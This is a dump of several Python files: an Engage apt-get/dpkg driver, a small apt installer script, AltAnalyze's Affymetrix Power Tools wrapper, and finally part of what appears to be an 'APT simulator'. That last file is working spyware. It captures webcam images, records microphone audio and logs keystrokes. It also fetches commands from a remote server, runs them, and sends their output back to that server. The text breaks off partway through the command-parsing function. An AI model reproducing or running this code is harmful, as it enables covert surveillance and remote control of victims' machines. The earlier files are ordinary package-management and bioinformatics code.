             _("dpkg-query executable not found at %(path)s"))
define_error(ERR_INSTALL_PKG_QUERY,
             _("dpkg-query for installed package %(pkg)s failed."))
define_error(ERR_PKG_NOT_INSTALLED,
             _("aptget package %(pkg)s not found after install in resource %(id)s"))
define_error(ERR_DPKG_NOT_FOUND,
             _("dpkg executable not found at %(path)s"))
define_error(ERR_PKG_FILE_NOT_FOUND,
             _("package file not found at %(path)s"))
define_error(ERR_DPKG_INSTALL,
             _("dpkg install failed for package file %(path)s"))
# Absolute paths to the Debian/Ubuntu package-management executables.
APT_GET_PATH = "/usr/bin/apt-get"
DPKG_QUERY_PATH = "/usr/bin/dpkg-query"
DPKG_PATH = "/usr/bin/dpkg"
def _get_env_for_aptget():
"""The apt-get utility may in some cases require that the PATH environment
variable be set. We take the current environment and then add a resonable
default path if one is not already present.
"""
env = copy.deepcopy(os.environ)
if not env.has_key("PATH"):
env["PATH"] = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
return env
# We track whether this execution of Engage has run the apt-get update command.
# If so, we don't run it for any subsequent requests. The update command is
# slow and frequently fails due to server availability issues.
update_run_this_execution = False
def run_update_if_not_already_run(sudo_password, env):
    """Run ``apt-get update`` (via sudo) at most once per Engage execution.

    :param sudo_password: password forwarded to iuprocess.run_sudo_program
    :param env: environment dict for the subprocess (see _get_env_for_aptget)
    """
    global update_run_this_execution
    if not update_run_this_execution:
        logger.info("Running apt-get update...")
        iuprocess.run_sudo_program([APT_GET_PATH, "-q", "-y", "update"], sudo_password,
                                   logger, env=env)
        update_run_this_execution=True
def apt_get_install(package_list, sudo_password):
    """Install the named apt packages (list of strings) via ``apt-get install``.

    Runs ``apt-get update`` first (at most once per execution).  Raises
    UserError(ERR_APT_GET_NOT_FOUND) if apt-get is missing, and converts a
    SudoError from the install into UserError(ERR_APT_GET_INSTALL).
    """
    env = _get_env_for_aptget()
    if not os.path.exists(APT_GET_PATH):
        raise UserError(errors[ERR_APT_GET_NOT_FOUND],
                        msg_args={"path":APT_GET_PATH})
    try:
        run_update_if_not_already_run(sudo_password, env)
        iuprocess.run_sudo_program([APT_GET_PATH, "-q", "-y", "install"]+package_list, sudo_password,
                                   logger,
                                   env=env)
    except iuprocess.SudoError, e:  # Python 2 except syntax
        # Preserve the nested traceback while surfacing a user-level error.
        exc_info = sys.exc_info()
        sys.exc_clear()
        raise convert_exc_to_user_error(exc_info, errors[ERR_APT_GET_INSTALL],
                                        msg_args={"pkgs":package_list.__repr__()},
                                        nested_exc_info=e.get_nested_exc_info())
def dpkg_install(package_file, sudo_password, may_have_dependencies=True):
    """Given a package's .deb file, install using dpkg. may_have_dependencies should
    be left at True if it is possible that the .deb package has dependencies that aren't
    being managed by Engage. In this case, it will run an apt-get update to make
    sure the package database is up-to-date. If you know that you don't have dependencies,
    set this to False to suppress the apt-get update call, which can fail due
    to remote servers being temporarily unavailable.

    Raises UserError for a missing dpkg executable or package file, and
    converts a SudoError from the install into UserError(ERR_DPKG_INSTALL).
    """
    env = _get_env_for_aptget()
    # Fail fast with specific errors before attempting any sudo work.
    if not os.path.exists(DPKG_PATH):
        raise UserError(errors[ERR_DPKG_NOT_FOUND],
                        msg_args={"path":DPKG_PATH})
    if not os.path.exists(package_file):
        raise UserError(errors[ERR_PKG_FILE_NOT_FOUND],
                        msg_args={"path":package_file})
    try:
        if may_have_dependencies:
            run_update_if_not_already_run(sudo_password, env)
        iuprocess.run_sudo_program([DPKG_PATH, "-i", package_file], sudo_password,
                                   logger, env=env)
    except iuprocess.SudoError, e:  # Python 2 except syntax
        exc_info = sys.exc_info()
        sys.exc_clear()
        raise convert_exc_to_user_error(exc_info, errors[ERR_DPKG_INSTALL],
                                        msg_args={"path":package_file},
                                        nested_exc_info=e.get_nested_exc_info())
class install(Action):
    """An action to install a list of packages via apt-get.

    ``run`` delegates to :func:`apt_get_install` with the sudo password from
    the action context; ``dry_run`` only verifies that the apt-get
    executable exists.

    The explicit ``__init__`` that merely forwarded to ``super()`` was
    removed; the inherited Action.__init__ is identical in effect.
    """
    NAME="aptget.install"

    def run(self, package_list):
        apt_get_install(package_list, self.ctx._get_sudo_password(self))

    def dry_run(self, package_list):
        _check_file_exists(APT_GET_PATH, self)
class debconf_set_selections(Action):
    """Run the debconf-set-selections utility.

    This pre-seeds answers to questions that apt-get would otherwise prompt
    for interactively.
    """
    NAME="aptget.debconf_set_selections"

    def run(self, selection_lines):
        # The selections are fed to the utility via a temporary file.
        with NamedTempFile(selection_lines) as tmp:
            cmd = ["/usr/bin/debconf-set-selections", tmp.name]
            iuprocess.run_sudo_program(cmd,
                                       self.ctx._get_sudo_password(self),
                                       self.ctx.logger,
                                       cwd="/usr/bin")

    def dry_run(self, selection_lines):
        # Nothing to verify ahead of time.
        pass

    def format_action_args(self, selection_lines):
        # The selection payload may be large/sensitive; do not echo it.
        return "%s <selection_lines>" % self.NAME
@make_action
def update(self, always_run=True):
    """ACTION: Run the apt-get update command to update the list of available
    packages. By default always run the update command, even if it was already
    run, as it is assumed that an explicit call readlly needs the update. This
    is the case for add_apt_repository, where subsequent packages won't
    even be visible.
    """
    global update_run_this_execution
    # Skip only when the caller allows it AND an update already happened.
    if not always_run and update_run_this_execution:
        self.ctx.logger.info("ignoring request for apt-get update, as update was already run")
        return
    self.ctx.logger.info("Running apt-get update...")
    iuprocess.run_sudo_program([APT_GET_PATH, "-q", "-y", "update"],
                               self.ctx._get_sudo_password(self),
                               self.ctx.logger,
                               env=_get_env_for_aptget())
    update_run_this_execution = True
def is_installed(package):
    """Return True iff dpkg-query reports *package* as 'install ok installed'.

    Raises UserError(ERR_DPKG_QUERY_NOT_FOUND) if dpkg-query is missing.

    Fixes: the local variable ``map`` shadowed the builtin, and the
    if/else returning True/False is collapsed to a boolean expression.
    """
    if not os.path.exists(DPKG_QUERY_PATH):
        raise UserError(errors[ERR_DPKG_QUERY_NOT_FOUND],
                        msg_args={"path":DPKG_QUERY_PATH})
    (rc, results) = iuprocess.run_program_and_scan_results(
        [DPKG_QUERY_PATH, "-s", package],
        {"status_ok": "^" + re.escape("Status: install ok installed")},
        logger, log_output=True)
    # Installed means the query succeeded AND the status line matched.
    return rc == 0 and bool(results['status_ok'])
@make_value_action
def is_pkg_installed(self, package):
    """Value action to see whether the specified apt package is installed"""
    # Thin value-action wrapper around the module-level is_installed().
    return is_installed(package)
@make_action
def check_installed(self, package):
    """verify that a aptget package is installed

    Raises UserError(ERR_PKG_NOT_INSTALLED) when dpkg-query does not report
    the package as installed for this resource.
    """
    if not is_installed(package):
        raise UserError(errors[ERR_PKG_NOT_INSTALLED],
                        msg_args={"pkg":package, "id":self.ctx.props.id})
@make_action
def ensure_installed(self, package):
    """Install *package* via apt-get unless it is already present."""
    if is_installed(package):
        self.ctx.logger.debug("Skipping install of package %s - already installed" %
                              package)
    else:
        apt_get_install([package], self.ctx._get_sudo_password(self))
# Resource-config schema (Python 2 `unicode` values): the host's sudo
# password is required as input; the apt package name is exposed on the
# 'apt_cfg' output port.
_config_type = {
    "input_ports": {
      "host": {
        "sudo_password" : unicode
      }
    },
    "output_ports": {
      "apt_cfg": {
        "package_name": unicode
      }
    }
  }
class Config(resource_metadata.Config):
    """Typed configuration wrapper for the apt resource."""
    # NOTE(review): the `id` and `package_name` parameters are accepted but
    # unused; confirm whether they should be stored on the instance.
    def __init__(self, props_in, types, id, package_name):
        resource_metadata.Config.__init__(self, props_in, types)
class Manager(resource_manager.Manager, PasswordRepoMixin):
    """Generic resource manager for a single apt/dpkg package."""
    # Installing packages requires sudo.
    REQUIRES_ROOT_ACCESS = True
    def __init__(self, metadata):
        # Human-readable "name version" string taken from the resource key.
        package_name = "%s %s" % (metadata.key["name"],
                                  metadata.key["version"])
        resource_manager.Manager.__init__(self, metadata, package_name)
        self.config = metadata.get_config(_config_type, Config,
                                          self.id, package_name)
    def validate_pre_install(self):
        # The only precondition checked up-front is that apt-get exists.
        if not os.path.exists(APT_GET_PATH):
            raise UserError(errors[ERR_APT_GET_NOT_FOUND],
                            msg_args={"path":APT_GET_PATH})
    def is_installed(self):
        # Delegates to the module-level dpkg-query check.
        return is_installed(self.config.output_ports.apt_cfg.package_name)
    def install(self, package):
        if isinstance(package, engage_utils.pkgmgr.Package):
            # Concrete Package object: download the .deb locally, then dpkg -i.
            # NOTE(review): self.install_context and self.ctx are not assigned
            # in this class; presumably provided by the framework/base class
            # -- confirm before relying on this branch.
            local_repository = self.install_context.engage_file_layout.get_cache_directory()
            package_path = package.download([], local_repository, dry_run=self.ctx.dry_run)
            dpkg_install(package_path, self._get_sudo_password())
        else:
            # Otherwise install by name via apt-get.
            apt_get_install([self.config.output_ports.apt_cfg.package_name],
                            self._get_sudo_password())
        self.validate_post_install()
    def validate_post_install(self):
        if not self.is_installed():
            raise UserError(errors[ERR_INSTALL_PKG_QUERY],
                            msg_args={"pkg":self.config.output_ports.apt_cfg.package_name})
| {
"repo_name": "quaddra/engage",
"path": "python_pkg/engage/drivers/genforma/aptget.py",
"copies": "1",
"size": "10863",
"license": "apache-2.0",
"hash": 7262312938786875000,
"line_mean": 38.9375,
"line_max": 118,
"alpha_frac": 0.6109730277,
"autogenerated": false,
"ratio": 3.753628196268141,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.486460122396814,
"avg_score": null,
"num_lines": null
} |
# aptinstall.py
#: i need to have apt installed
########################## DEPRECATE BECAUSE installing apt is not as complete
########################## as using fabric despite 3.0 issues
import apt
import sys
import requests
def simple_apt_install(pkg_name):
    """Install *pkg_name* via python-apt, skipping if already installed.

    Errors from cache.commit() are reported to stderr rather than raised.
    (Python 2: uses print statements.)
    """
    cache = apt.cache.Cache()
    cache.update()
    pkg = cache[pkg_name]
    if pkg.is_installed:
        print "{pkg_name} already installed".format(pkg_name=pkg_name)
    else:
        pkg.mark_install()
        try:
            cache.commit()
        except Exception, arg:  # Python 2 except syntax
            print >> sys.stderr, "Sorry, package installation failed [{err}]".format(err=str(arg))
def download_file(url):
    """Download *url* into the current directory, streaming in 1 KiB chunks.

    Returns the local filename (the last path component of the URL).
    Raises requests.HTTPError on a non-2xx response instead of silently
    writing the server's error page to disk, and closes the response
    connection when finished.
    """
    local_filename = url.split('/')[-1]
    # NOTE the stream=True parameter: the body is fetched lazily so large
    # files are never held in memory in full.
    with requests.get(url, stream=True) as r:
        r.raise_for_status()  # fail fast on 4xx/5xx rather than saving the error body
        with open(local_filename, 'wb') as f:
            for chunk in r.iter_content(chunk_size=1024):
                if chunk:  # filter out keep-alive new chunks
                    f.write(chunk)
                    # f.flush() commented by recommendation from J.F.Sebastian
    return local_filename
def download_and_dpkg():
    """Fetch the Atom editor .deb release and install it via python-apt."""
    url = 'https://github.com/atom/atom/releases/download/v1.12.5/atom-amd64.deb'
    deb_path = download_file(url)
    apt.debfile.DebPackage(filename=deb_path).install()
def install_base():
    """Install the baseline package set via apt."""
    for pkg_name in ("fabric", "emacs"):
        simple_apt_install(pkg_name)
def main():
    # Entry point: install the base packages.  The dpkg-based Atom install
    # is currently disabled.
    install_base()
    # download_and_dpkg()
if __name__ == '__main__':
    main()
| {
"repo_name": "mikadosoftware/weaver",
"path": "weaver/fabmodules/atominstall.py",
"copies": "1",
"size": "1500",
"license": "mit",
"hash": -8995738462746306000,
"line_mean": 24.4237288136,
"line_max": 91,
"alpha_frac": 0.5986666667,
"autogenerated": false,
"ratio": 3.4965034965034967,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9549123102429662,
"avg_score": 0.009209412154766847,
"num_lines": 59
} |
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, string
import os.path
import unique
import UI
import export; reload(export)
import time
import shutil
import traceback
def filepath(filename):
    """Resolve *filename* through the project's unique.filepath helper."""
    return unique.filepath(filename)
def osfilepath(filename):
    """Resolve *filename* and normalize backslashes to forward slashes."""
    return filepath(filename).replace('\\','/')
def cleanUpLine(line):
    """Strip line terminators (newline, carriage return, the literal
    backslash-c pair) and double quotes from a raw input line."""
    for junk in ('\n', '\c', '\r', '"'):
        line = line.replace(junk, '')
    return line
def annotateMetaProbesetGenes(summary_exp_file, expression_file, metaprobeset_file, species):
    """Rewrite an APT summary file, replacing metaprobeset UIDs with Ensembl gene IDs.

    The UID -> Ensembl mapping is read from the species conversion file
    derived from the .mps metaprobeset filename.  Comment lines ('#') are
    dropped and the header row is copied through unchanged.
    """
    # Derive the conversion-table path from the .mps filename.
    metaprobeset_cv_file = string.replace(metaprobeset_file,species+'_',species+'_Conversion_')
    metaprobeset_cv_file = string.replace(metaprobeset_cv_file,'.mps','.txt')
    # Build the UID -> Ensembl gene lookup.
    fn=filepath(metaprobeset_cv_file); uid_db={}
    for line in open(fn,'rU').xreadlines():
        data = UI.cleanUpLine(line)
        uid,ens_gene = string.split(data,'\t')
        uid_db[uid] = ens_gene
    export_data = export.ExportFile(expression_file)
    fn=filepath(summary_exp_file); x=0
    for line in open(fn,'rU').xreadlines():
        if line[0] == '#': null=[]  # skip APT comment lines
        elif x == 0: export_data.write(line); x+=1  # header row: copy verbatim
        else:
            data = cleanUpLine(line)
            t = string.split(data,'\t')
            # Substitute the Ensembl gene ID for the UID in column 0.
            uid = t[0]; ens_gene = uid_db[uid]
            export_data.write(string.join([ens_gene]+t[1:],'\t')+'\n')
    export_data.close()
def reformatResidualFile(residual_exp_file,residual_destination_file):
    """Re-write the residuals file so it has a single combined unique ID
    (arbitrary gene ID + probe ID), then move it to its destination.

    Columns 0 and 2 of each data row are fused into one UID column and
    the first five columns are otherwise dropped.  The source file is
    deleted afterwards.
    """
    print 'Re-formatting and moving the calculated residuals file...'
    export_data = export.ExportFile(residual_destination_file)
    fn=filepath(residual_exp_file); x=0
    for line in open(fn,'rU').xreadlines():
        data = cleanUpLine(line)
        if x==0 and data[0]=='#': null=[]  # ignore leading comment lines
        elif x == 0:
            # Header row: replace the first five columns with a single 'UID'.
            x+=1; t = string.split(data,'\t')
            export_data.write(string.join(['UID']+t[5:],'\t')+'\n')
        else:
            t = string.split(data,'\t')
            uid = t[0]+'-'+t[2] ### arbitrary numeric gene ID + probes ID
            export_data.write(string.join([uid]+t[5:],'\t')+'\n')
    export_data.close()
    os.remove(residual_exp_file)
def verifyFileLength(filename):
    """Return the number of lines in *filename*, capped at 10.

    Returns 0 when the file is missing or unreadable; used as a cheap
    existence / non-empty check.
    """
    total = 0
    try:
        path = filepath(filename)
        for _ in open(path,'rU').xreadlines():
            total += 1
            if total > 9:
                break
    except Exception:
        pass
    return total
def APTDebugger(output_dir):
    """Scan the apt-probeset-summarize log for a 'FATAL ERROR:' line.

    Returns the last matching line, or '' when none is found.
    """
    fatal_error = ''
    log_path = filepath(output_dir+'/apt-probeset-summarize.log')
    for entry in open(log_path,'rU').xreadlines():
        if 'FATAL ERROR:' in entry:
            fatal_error = entry
    return fatal_error
def probesetSummarize(exp_file_location_db,analyze_metaprobesets,probeset_type,species,root):
    """Run Affymetrix Power Tools (APT) probeset summarization over CEL files.

    For each dataset, locates the platform-specific apt-probeset-summarize
    binary, runs it (RMA, plus DABG p-values and metaprobeset handling where
    applicable), and copies/reformats the resulting summary, stats and
    residual files into the project's expected locations.  On failure with
    a 64-bit binary it retries once with the 32-bit build; otherwise it
    reports the failure via WarningWindow (or forces an exit headlessly).

    NOTE(review): the deliberate bare names `bad_exit` / `force_exit` raise
    NameError on purpose to reach the `except NameError` handlers.
    """
    for dataset in exp_file_location_db: ### Instance of the Class ExpressionFileLocationData
        fl = exp_file_location_db[dataset]
        apt_dir =fl.APTLocation()
        array_type=fl.ArrayType()
        pgf_file=fl.InputCDFFile()
        clf_file=fl.CLFFile()
        bgp_file=fl.BGPFile()
        xhyb_remove = fl.XHybRemoval()
        cel_dir=fl.CELFileDir() + '/cel_files.txt'
        expression_file = fl.ExpFile()
        stats_file = fl.StatsFile()
        output_dir = fl.OutputDir() + '/APT-output'
        cache_dir = output_dir + '/apt-probeset-summarize-cache'
        architecture = fl.Architecture() ### May over-ride the real architecture if a failure occurs
        get_probe_level_results = 'yes'
        if get_probe_level_results == 'yes': export_features = 'yes'
        if xhyb_remove == 'yes' and (array_type == 'gene' or array_type == 'junction'): xhyb_remove = 'no' ### This is set when the user mistakenly selects exon array, initially
        if analyze_metaprobesets == 'yes':
            export_features = 'true'
            metaprobeset_file = filepath('AltDatabase/'+species+'/'+array_type+'/'+species+'_'+array_type+'_'+probeset_type+'.mps')
            count = verifyFileLength(metaprobeset_file)
            if count<2:
                import ExonArray
                ExonArray.exportMetaProbesets(array_type,species) ### Export metaprobesets for this build
        import subprocess; import platform
        print 'Processor architecture set =',architecture,platform.machine()
        # Select the APT binary for the current OS/architecture.
        if '/bin' in apt_dir: apt_file = apt_dir +'/apt-probeset-summarize' ### if the user selects an APT directory
        elif os.name == 'nt':
            if '32bit' in architecture: apt_file = apt_dir + '/PC/32bit/apt-probeset-summarize'; plat = 'Windows'
            elif '64bit' in architecture: apt_file = apt_dir + '/PC/64bit/apt-probeset-summarize'; plat = 'Windows'
        elif 'darwin' in sys.platform: apt_file = apt_dir + '/Mac/apt-probeset-summarize'; plat = 'MacOSX'
        elif 'linux' in sys.platform:
            if '32bit' in platform.architecture(): apt_file = apt_dir + '/Linux/32bit/apt-probeset-summarize'; plat = 'linux32bit'
            elif '64bit' in platform.architecture(): apt_file = apt_dir + '/Linux/64bit/apt-probeset-summarize'; plat = 'linux64bit'
        apt_file = filepath(apt_file)
        apt_extract_file = string.replace(apt_file,'probeset-summarize','cel-extract')
        #print 'AltAnalyze has choosen APT for',plat
        print "Beginning probeset summarization of input CEL files with Affymetrix Power Tools (APT)..."
        if 'cdf' in pgf_file or 'CDF' in pgf_file:
            # 3' arrays (CDF library files).
            if xhyb_remove == 'yes' and array_type == 'AltMouse':
                kill_list_dir = osfilepath('AltDatabase/'+species+'/AltMouse/'+species+'_probes_to_remove.txt')
            else: kill_list_dir = osfilepath('AltDatabase/affymetrix/APT/probes_to_remove.txt')
            try:
                ### Below code attempts to calculate probe-level summarys and absent/present p-values
                ### for 3'arrays (may fail for arrays with missing missmatch probes - AltMouse)
                cdf_file = pgf_file; algorithm = 'rma'
                retcode = subprocess.call([
                    apt_file, "-d", cdf_file, "--kill-list", kill_list_dir, "-a", algorithm, "-o", output_dir,
                    "--cel-files", cel_dir, "-a", "pm-mm,mas5-detect.calls=1.pairs=1"])
                try:
                    extract_retcode = subprocess.call([
                        apt_extract_file, "-d", cdf_file, "--pm-with-mm-only", "-o", output_dir+'/probe.summary.txt',
                        "--cel-files", cel_dir, "-a"]) ### "quant-norm,pm-gcbg", "--report-background" -requires a BGP file
                except Exception,e:
                    #print traceback.format_exc()
                    retcode = False ### On some system there is a no file found error, even when the analysis completes correctly
                if retcode: status = 'failed'
                else:
                    status = 'run'
                    summary_exp_file = output_dir+'/'+algorithm+'.summary.txt'
                    export.customFileCopy(summary_exp_file, expression_file) ### Removes the # containing lines
                    #shutil.copyfile(summary_exp_file, expression_file)
                    os.remove(summary_exp_file)
                    summary_stats_file = output_dir+'/pm-mm.mas5-detect.summary.txt'
                    try: shutil.copyfile(summary_stats_file, stats_file)
                    except Exception: None ### Occurs if dabg export failed
                    os.remove(summary_stats_file)
            except Exception:
                #print traceback.format_exc()
                # Fallback: retry without the pm-mm/mas5 detection pass.
                try:
                    cdf_file = pgf_file; algorithm = 'rma'; pval = 'dabg'
                    retcode = subprocess.call([
                        apt_file, "-d", cdf_file, "--kill-list", kill_list_dir, "-a", algorithm, "-o", output_dir, "--cel-files", cel_dir]) # "-a", pval,
                    if retcode: status = 'failed'
                    else:
                        status = 'run'
                        summary_exp_file = output_dir+'/'+algorithm+'.summary.txt'
                        export.customFileCopy(summary_exp_file, expression_file) ### Removes the # containing lines
                        #shutil.copyfile(summary_exp_file, expression_file)
                        os.remove(summary_exp_file)
                except NameError:
                    status = 'failed'
                    #print traceback.format_exc()
        else:
            # Exon/gene/junction arrays (PGF/CLF/BGP library files).
            if xhyb_remove == 'yes':
                kill_list_dir = osfilepath('AltDatabase/'+species+'/exon/'+species+'_probes_to_remove.txt')
            else: kill_list_dir = osfilepath('AltDatabase/affymetrix/APT/probes_to_remove.txt')
            if 'Glue' in pgf_file:
                kill_list_dir = string.replace(pgf_file,'pgf','kil') ### Needed to run DABG without crashing
            #psr_dir = string.replace(pgf_file,'pgf','PSR.ps') ### used with -s
            try:
                algorithm = 'rma-sketch'; pval = 'dabg'
                if analyze_metaprobesets != 'yes':
                    retcode = subprocess.call([
                        apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir,
                        "-a", algorithm, "-a", pval, "-o", output_dir, "--cel-files", cel_dir]) # "--chip-type", "hjay", "--chip-type", "HJAY" http://www.openbioinformatics.org/penncnv/penncnv_tutorial_affy_gw6.html
                    if retcode:
                        # Non-zero exit: check whether DABG caused a fatal error
                        # and retry without it.
                        summary_exp_file = output_dir+'/'+pval+'.summary.txt'
                        try: os.remove(summary_exp_file)
                        except Exception: null=[] ### Occurs if dabg export failed
                        fatal_error = APTDebugger(output_dir)
                        if len(fatal_error)>0:
                            print fatal_error
                            print 'Skipping DABG p-value calculation to resolve (Bad library files -> contact Affymetrix support)'
                            retcode = subprocess.call([
                                apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir,
                                "-a", algorithm, "-o", output_dir, "--cel-files", cel_dir]) ### Exclude DABG p-value - known issue for Glue junction array
                        else: bad_exit
                else:
                    retcode = subprocess.call([
                        apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir, "-m", metaprobeset_file,
                        "-a", algorithm, "-a", pval, "-o", output_dir, "--cel-files", cel_dir, "--feat-details", export_features])
                    if retcode:
                        summary_exp_file = output_dir+'/'+pval+'.summary.txt'
                        try: os.remove(summary_exp_file)
                        except Exception: null=[] ### Occurs if dabg export failed
                        fatal_error = APTDebugger(output_dir)
                        if len(fatal_error)>0:
                            print fatal_error
                            print 'Skipping DABG p-value calculation to resolve (Bad library files -> contact Affymetrix support)'
                            retcode = subprocess.call([
                                apt_file, "-p", pgf_file, "-c", clf_file, "-b", bgp_file, "--kill-list", kill_list_dir, "-m", metaprobeset_file,
                                "-a", algorithm, "-o", output_dir, "--cel-files", cel_dir, "--feat-details", export_features]) ### Exclude DABG p-value - known issue for Glue junction array
                        else: bad_exit
                if retcode: status = 'failed'
                else:
                    status = 'run'
                    summary_exp_file = output_dir+'/'+algorithm+'.summary.txt'
                    #if analyze_metaprobesets == 'yes': annotateMetaProbesetGenes(summary_exp_file, expression_file, metaprobeset_file, species)
                    export.customFileCopy(summary_exp_file, expression_file) ### Removes the # containing lines
                    #shutil.copyfile(summary_exp_file, expression_file)
                    os.remove(summary_exp_file)
                    summary_exp_file = output_dir+'/'+pval+'.summary.txt'
                    #if analyze_metaprobesets == 'yes': annotateMetaProbesetGenes(summary_exp_file, stats_file, metaprobeset_file, species)
                    try:
                        shutil.copyfile(summary_exp_file, stats_file)
                        os.remove(summary_exp_file)
                    except Exception:
                        print traceback.format_exc()
                        null=[] ### Occurs if dabg export failed
                    if analyze_metaprobesets == 'yes':
                        residual_destination_file = string.replace(expression_file,'exp.','residuals.')
                        residual_exp_file = output_dir+'/'+algorithm+'.residuals.txt'
                        #shutil.copyfile(residual_exp_file, residual_destination_file);os.remove(residual_exp_file)
                        reformatResidualFile(residual_exp_file,residual_destination_file)
                        residual_dabg_file = output_dir+'/dabg.residuals.txt'; os.remove(residual_dabg_file)
            except NameError:
                status = 'failed'
                #print traceback.format_exc()
        cache_delete_status = export.deleteFolder(cache_dir)
        if status == 'failed':
            if architecture == '64bit' and platform.architecture()[0] == '64bit' and (os.name == 'nt' or 'linux' in sys.platform):
                print 'Warning! 64bit version of APT encountered an error, trying 32bit.'
                ### If the above doesn't work, try 32bit architecture instead of 64bit (assuming the problem is related to known transient 64bit build issues)
                for dataset in exp_file_location_db: ### Instance of the Class ExpressionFileLocationData
                    fl = exp_file_location_db[dataset]; fl.setArchitecture('32bit')
                probesetSummarize(exp_file_location_db,analyze_metaprobesets,probeset_type,species,root)
            else:
                print_out = 'apt-probeset-summarize failed. See log and report file in the output folder under "ExpressionInput/APT-output" for more details.'
                try:
                    WarningWindow(print_out,'Exit')
                    root.destroy()
                except Exception:
                    print print_out; force_exit
        else:
            print 'CEL files successfully processed. See log and report file in the output folder under "ExpressionInput/APT-output" for more details.'
| {
"repo_name": "wuxue/altanalyze",
"path": "APT.py",
"copies": "2",
"size": "15855",
"license": "apache-2.0",
"hash": 1052014943234627300,
"line_mean": 56.4456521739,
"line_max": 211,
"alpha_frac": 0.5763481552,
"autogenerated": false,
"ratio": 3.9322916666666665,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5508639821866667,
"avg_score": null,
"num_lines": null
} |
from VideoCapture import Device
import pyaudio
import wave
import subprocess
import pythoncom, pyHook
import sys
import re
import os
import time
import urllib2
import logging
# reload(sys) restores sys.setdefaultencoding, which site.py removes at
# startup; the encoding keeps Turkish (iso-8859-9) output from raising
# UnicodeDecodeError.
reload(sys)
sys.setdefaultencoding('iso-8859-9')
# Shared urllib2 opener used by all requests to the simulator server.
opener = urllib2.build_opener(urllib2.HTTPHandler)
urllib2.install_opener(opener)
# Set to 0 to silence all console status output.
console = 1
def cls():
    """Clear the terminal, picking a platform-appropriate shell command."""
    if sys.platform in ('linux-i386', 'linux2'):
        os.system("clear")
    else:
        # win32 and every other platform fall back to "cls".
        os.system("cls")
def take_screenshot():
    # Capture an image to apt.jpg.  NOTE(review): VideoCapture's Device()
    # grabs a webcam frame, not the desktop — the function name may be
    # misleading; confirm intent.
    if console:
        print "* Taking screenshot..."
    cam = Device()
    cam.saveSnapshot('apt.jpg')
    if console:
        print "* done\n"
def record_audio():
    # Record 5 seconds of stereo 44.1 kHz audio from the default input
    # device and save it to apt.wav.
    CHUNK = 1024              # frames per buffer read
    FORMAT = pyaudio.paInt16  # 16-bit samples
    CHANNELS = 2
    RATE = 44100
    RECORD_SECONDS = 5
    WAVE_OUTPUT_FILENAME = "apt.wav"
    p = pyaudio.PyAudio()
    stream = p.open(format=FORMAT,
                    channels=CHANNELS,
                    rate=RATE,
                    input=True,
                    frames_per_buffer=CHUNK)
    if console:
        print "* Recording audio..."
    frames = []
    # Read enough CHUNK-sized buffers to cover RECORD_SECONDS of audio.
    for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
        data = stream.read(CHUNK)
        frames.append(data)
    if console:
        print "* done\n"
    stream.stop_stream()
    stream.close()
    p.terminate()
    # Write the captured frames out as a standard WAV file.
    wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
    wf.setnchannels(CHANNELS)
    wf.setsampwidth(p.get_sample_size(FORMAT))
    wf.setframerate(RATE)
    wf.writeframes(b''.join(frames))
    wf.close()
def keylogger():
    # Log keystrokes to keylogs.txt (next to this script) using pyHook.
    # Recording stops when Enter (ASCII 13) is pressed, after which control
    # returns to main().
    if console:
        print "* Logging key events... (press enter to escape)"
    def OnKeyboardEvent (event):
        # Called by pyHook for every key-down event.
        keys = ""
        full_path = os.path.realpath(__file__)
        path, file = os.path.split(full_path)
        # NOTE(review): "\k" is not an escape sequence, so this is literally
        # backslash + "keylogs.txt" — works as a Windows path separator.
        path = path + "\keylogs.txt"
        keyfile = open(path, "a")
        key = chr(event.Ascii)
        if event.Ascii == 13:
            # Enter pressed: write a newline, unhook, and resume main().
            key = "\n"
            hook.UnhookKeyboard()
            if console:
                print "* done\n"
            main()
        keys = keys + key
        keyfile.write(keys)
        keyfile.close()
    hook = pyHook.HookManager()
    hook.KeyDown = OnKeyboardEvent
    hook.HookKeyboard()
    # Windows message pump; blocks while the hook is active.
    pythoncom.PumpMessages()
def process_order(cmd):
    # Execute the received shell command and send its stdout back to the
    # simulator server via a GET request.
    if console:
        print "* Running received command:", cmd
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    result = p.communicate()[0]
    if console:
        print "* Command output:", result
       # print "* done."
    # NOTE(review): result is appended without URL-encoding; output with
    # spaces/newlines will likely break the request — confirm server side.
    url = "http://www.mertsarica.com/apt_simulator/apt.php?cmd=" + result
    if console:
        print "* Sending command output (%s) to APT Simulator..." % (result.strip())
    response = opener.open(url)
    if console:
        print "* done\n"
def take_order():
    # Poll the simulator server for a colon-separated 4-field command string
    # (field1:field2:field3:field4) and dispatch the requested actions.
    url = "http://www.mertsarica.com/apt_simulator/apt.php"
    print "* Connecting to APT Simulator:", url
    response = opener.open(url)
    html = response.read()
    # Pattern: four lowercase identifiers separated by colons.
    re1='((?:[a-z][a-z0-9_]*))'	# Variable Name 1
    re2='(:)'	# Any Single Character 1
    re3='((?:[a-z][a-z0-9_]*))'	# Variable Name 2
    re4='(:)'	# Any Single Character 2
